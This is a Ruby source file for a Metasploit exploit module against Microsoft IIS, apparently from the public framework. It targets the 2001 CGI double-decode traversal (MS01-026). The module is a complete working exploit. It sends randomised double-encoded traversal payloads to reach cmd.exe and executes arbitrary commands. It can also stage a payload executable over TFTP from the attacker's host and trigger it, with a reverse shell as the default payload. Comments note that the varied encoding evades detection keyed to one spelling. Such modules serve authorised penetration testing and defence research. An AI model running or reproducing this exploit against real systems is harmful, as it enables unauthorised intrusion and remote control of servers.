Path: blob/master/modules/exploits/windows/iis/ms01_026_dbldecode.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# MS01-026 / CVE-2001-0333: IIS/PWS CGI filename double-decode.
#
# Requests to /scripts/ carry a double-URL-encoded "..\" traversal (see
# #dotdotslash) that reaches cmd.exe in %WINDIR%\system32. The module then
# either runs one command (:win_command target) or stages an executable
# through the CmdStager mixin and triggers it with a direct request
# (:win_dropper target).
#
# Artifacts this module creates, matching the 'Notes' declared below:
# a copy of cmd.exe under a random name in the IIS scripts directory
# (deleted again in #cleanup) and, for the dropper target, the payload exe
# (registered with FileDropper, although the description warns it may
# remain). Every request URI contains the encoded traversal sequences,
# which is presumably the IOC_IN_LOGS side effect the notes refer to.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  include Msf::Exploit::FileDropper

  # Module metadata and options.
  #
  # WINDIR is optional: when it is not set, #exploit falls back to
  # #detect_windows_directory. DEPTH is the number of traversal sequences
  # prepended to the cmd.exe path in #execute_command (default 2).
  # needs_cleanup is set so that #cleanup runs after the module finishes.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'MS01-026 Microsoft IIS/PWS CGI Filename Double Decode Command Execution',
        'Description' => %q{
          This module will execute an arbitrary payload on a Microsoft IIS installation
          that is vulnerable to the CGI double-decode vulnerability of 2001.

          This module has been tested successfully on:

          Windows 2000 Professional (SP0) (EN);
          Windows 2000 Professional (SP1) (AR);
          Windows 2000 Professional (SP1) (CZ);
          Windows 2000 Server (SP0) (FR);
          Windows 2000 Server (SP1) (EN); and
          Windows 2000 Server (SP1) (SE).

          Note: This module will leave a Metasploit payload exe in the IIS scripts directory.
        },
        'Author' => [ 'jduck' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2001-0333' ],
          [ 'OSVDB', '556' ],
          [ 'BID', '2708' ],
          [ 'MSB', 'MS01-026' ],
          [ 'URL', 'http://marc.info/?l=bugtraq&m=98992056521300&w=2' ]
        ],
        'Platform' => 'win',
        'Targets' => [
          [
            'Windows (Dropper)',
            {
              'Platform' => 'win',
              'Arch' => [ARCH_X86],
              'DefaultOptions' => { 'PAYLOAD' => 'windows/shell/reverse_tcp' },
              'Type' => :win_dropper
            }
          ],
          [
            'Windows (Command)',
            {
              'Platform' => 'win',
              'Arch' => ARCH_CMD,
              'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/generic' },
              'Type' => :win_command
            }
          ]
        ],
        # The dropper target transfers the payload with TFTP, so the target
        # host needs outbound TFTP to SRVHOST (see the :win_dropper branch
        # of #exploit).
        'CmdStagerFlavor' => 'tftp',
        'Notes' => {
          'Stability' => [ CRASH_SAFE ],
          'Reliability' => [ REPEATABLE_SESSION ],
          'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ]
        },
        'DefaultTarget' => 0,
        'DisclosureDate' => '2001-05-15'
      )
    )

    register_options(
      [
        Opt::RPORT(80),
        OptString.new('WINDIR', [ false, 'The Windows directory name of the target host', nil ]),
        OptInt.new('DEPTH', [ true, 'Traversal depth to reach the drive root', 2 ])
      ]
    )

    self.needs_cleanup = true
  end

  # Returns one randomly chosen, double-encoded "..\" / "../" sequence.
  #
  # Each entry only becomes a plain traversal after a second URL-decoding
  # pass, which is the MS01-026 bug. Because the choice is random, the
  # exact encoding differs from request to request; a detection that keys
  # on one particular spelling will not see every run.
  #
  # @return [String]
  def dotdotslash
    [
      '..%255c',
      '..%%35c',
      '..%%35%63',
      '..%25%35%63',
      '.%252e/',
      '%252e./',
      '%%32%65./',
      '.%%32%65/',
      '.%25%32%65/',
      '%25%32%65./'
    ].sample
  end

  # Detect the correct Windows directory name.
  # Unfortunately, the IIS scripts directory must
  # be located on the same drive as %SystemRoot%.
  #
  # Tries 'winnt' then 'windows' by running `dir` through cmd.exe and
  # looking for strings a listing of the scripts directory would contain.
  # This is an active probe: it executes a command on the target and is
  # what #check calls, so #check is not a passive test.
  #
  # @return [String, nil] the directory name that produced a listing, or nil
  def detect_windows_directory
    win_dirs = %w[winnt windows]
    matches = [
      'Directory of',
      '\\inetpub\\',
      "\\scripts\r\n"
    ]

    win_dirs.each do |dir|
      # windir: is passed explicitly because @win_dir is not set yet
      res = execute_command('dir', windir: dir)
      next unless res
      next unless res.code == 200
      next unless res.body

      matches.each do |m|
        return dir if res.body.to_s.include?(m)
      end
    end

    nil
  end

  # Vulnerable when a Windows directory could be found, Safe otherwise.
  #
  # Note that detection works by executing `dir` on the target, so this
  # check sends real traversal requests (presumably visible in the server
  # logs) rather than a harmless version probe.
  #
  # @return [Msf::Exploit::CheckCode]
  def check
    win_dir = detect_windows_directory
    win_dir ? CheckCode::Vulnerable("Found Windows directory name: #{win_dir}") : CheckCode::Safe
  end

  # Runs +cmd+ through cmd.exe via the /scripts/ CGI directory.
  #
  # Presumably also the callback the CmdStager mixin uses, which is why the
  # options given to execute_cmdstager in #exploit (cgifname:) show up here.
  #
  # @param cmd [String] command line to run
  # @param opts [Hash]
  #   :cgifname - name of an already-copied cmd.exe in the scripts directory;
  #               when present the traversal path is not built at all
  #   :windir   - Windows directory name to use instead of @win_dir
  # @return [Rex::Proto::Http::Response, nil] the response (20 s timeout), or
  #   nil when the command is a `start ... .exe` request, which is skipped
  def execute_command(cmd, opts = {})
    # Don't run the start command...
    # We'll execute the payload via IIS later.
    # Using the "start" method doesn't seem to make IIS very happy :(
    return if cmd.start_with?('start') && cmd.include?('.exe')

    vprint_status("Executing command: #{cmd}")
    if opts[:cgifname]
      cmd_path = opts[:cgifname]
    else
      # DEPTH traversal sequences, then <windir>/system32/cmd.exe
      cmd_path = ''
      datastore['DEPTH'].times { cmd_path << dotdotslash }
      cmd_path << (opts[:windir] || @win_dir)
      cmd_path << '/system32/cmd.exe'
    end
    uri = "/scripts/#{cmd_path}?/x+/c+#{Rex::Text.uri_encode(cmd)}"
    send_request_cgi({ 'uri' => uri }, 20)
  end

  # Copies \<windir>\system32\cmd.exe into the IIS scripts directory under a
  # random 4-7 character name so later commands can be sent without the
  # traversal path.
  #
  # Only a missing reply is treated as failure; the response body is not
  # inspected, so a copy that did not succeed is only noticed on a later
  # request.
  #
  # @return [String] the file name used for the copy
  # @raise [Msf::Exploit::Failed] via fail_with when the server does not reply
  def copy_cmd_exe_to_scripts_directory
    fname = "#{rand_text_alphanumeric(4..7)}.exe"
    print_status("Copying \"\\#{@win_dir}\\system32\\cmd.exe\" to the IIS scripts directory as \"#{fname}\"...")
    res = execute_command("copy \\#{@win_dir}\\system32\\cmd.exe #{fname}")
    fail_with(Failure::Unknown, 'No reply from server') unless res
    fname
  end

  # Main entry point: resolve the Windows directory, copy cmd.exe into the
  # scripts directory, then run the selected target.
  #
  # :win_command runs payload.encoded once and prints whatever the server
  # returned. :win_dropper stages the payload with the TFTP CmdStager and
  # then requests the dropped exe directly, because #execute_command refuses
  # to run the stager's `start` command.
  def exploit
    # WINDIR, when set, skips the active detection probe
    @win_dir = datastore['WINDIR'] || detect_windows_directory

    fail_with(Failure::NotVulnerable, 'Unable to detect the target host Windows directory (maybe not vulnerable)!') unless @win_dir

    print_status("Using Windows directory \"#{@win_dir}\"")

    # Remembered in an ivar so #cleanup can delete the copy afterwards
    @cmd_exe_fname = copy_cmd_exe_to_scripts_directory

    case target['Type']
    when :win_command
      res = execute_command(payload.encoded, cgifname: @cmd_exe_fname)

      if res && res.body
        # On a non-200 reply the output is taken from the first <pre> block
        # of the error page, if any
        cmd_res = res.code == 200 ? res.body : res.body.to_s.scan(%r{<pre>(.*?)</pre>}m).flatten.first.to_s
        if cmd_res.strip.blank?
          print_status('Command returned no output')
        else
          print_good('Command output:')
          print_line(cmd_res)
        end
      else
        print_error('No reply')
      end
    when :win_dropper
      # A wildcard SRVHOST cannot be handed to the target; use the address
      # this host would route from instead
      tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
      execute_cmdstager(
        temp: '.',
        linemax: 1_400,
        cgifname: @cmd_exe_fname,
        tftphost: tftphost,
        # Force noconcat so we can skip the "start" command in execute_command method
        noconcat: true,
        # We can't delete the payload while it is running, so don't try
        nodelete: true
      )

      # The dropped exe is handed to FileDropper; the description notes it
      # may still be left behind
      exe_payload = stager_instance.payload_exe
      register_file_for_cleanup(exe_payload)

      print_status("Triggering payload \"#{exe_payload}\" via a direct request...")
      send_request_cgi({ 'uri' => "/scripts/#{exe_payload}" }, 1)
    end
  end

  # Remove the copied cmd.exe from the IIS scripts directory
  #
  # Runs only when a copy was made; the parent cleanup (which includes
  # FileDropper's) always runs via the ensure.
  def cleanup
    execute_command("del #{@cmd_exe_fname}") if @cmd_exe_fname
  ensure
    super
  end
end